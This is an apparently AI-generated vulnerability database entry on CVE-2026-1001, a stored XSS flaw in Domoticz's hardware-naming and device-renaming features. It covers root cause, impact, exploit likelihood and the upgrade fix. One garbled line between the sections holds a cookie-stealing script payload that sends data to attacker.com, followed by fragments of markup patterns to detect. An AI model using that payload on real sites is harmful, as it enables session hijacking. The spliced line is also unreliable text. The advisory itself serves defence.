
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1001 is a stored cross-site scripting (XSS) vulnerability in the Domoticz home automation platform affecting all versions prior to 2026.1. The flaw exists in the "Add Hardware" and "rename device" functionality of the Domoticz web interface, allowing authenticated administrators to inject and store malicious scripts or HTML markup. It was published on March 25, 2026, with the CVE assigned by VulnCheck. The vulnerability carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 4.8 (Medium) (Red Hat Advisory, Red Hat Bugzilla).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically the absence of proper output encoding when rendering hardware names and device names in the Domoticz web interface. An authenticated administrator can supply crafted names containing <script> tags or other HTML markup via the Add Hardware or rename device endpoints; this input is stored server-side and subsequently rendered unsanitized in the browsers of any user viewing the affected page. Exploitation requires network access to the Domoticz web interface, administrator-level credentials, and a victim user to view the affected page (user interaction required). No public proof-of-concept code has been identified (Red Hat Bugzilla, Red Hat Advisory).
Successful exploitation causes arbitrary script execution in the browsers of users viewing the affected Domoticz web interface pages, enabling unauthorized actions within their session context. The primary impacts are limited confidentiality loss (e.g., session token theft) and integrity loss (e.g., unauthorized actions performed on behalf of the victim user); availability is not affected. Because Domoticz controls IoT and home automation hardware, session hijacking could potentially allow an attacker to manipulate connected devices or exfiltrate configuration data (Red Hat Advisory, Red Hat Bugzilla).
There is no evidence of public proof-of-concept code or active in-the-wild exploitation at this time. The EPSS score is approximately 0.07%, reflecting a low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for administrator-level credentials and victim user interaction (Red Hat Advisory).
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>.<script>, javascript:, onerror=, or other HTML/script markup patterns.The primary remediation is to upgrade Domoticz to version 2026.1 or later, which contains fixes for this vulnerability (Red Hat Advisory). As interim mitigations, restrict administrator privileges to only fully trusted users, implement a Content Security Policy (CSP) on the Domoticz web interface to block inline script execution, and monitor administrator activity for suspicious hardware additions or device renames containing HTML or script markup. Fedora packages have also been updated to address this issue (Linux Security Fedora Advisory).
The vulnerability received routine coverage from Linux distribution security channels, including Fedora and Rocky Linux advisories, and was noted in German-language security news (pro-linux.de). No significant vendor statements beyond the patch release or notable researcher commentary have been identified. Social media activity was limited to automated CVE notification accounts.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."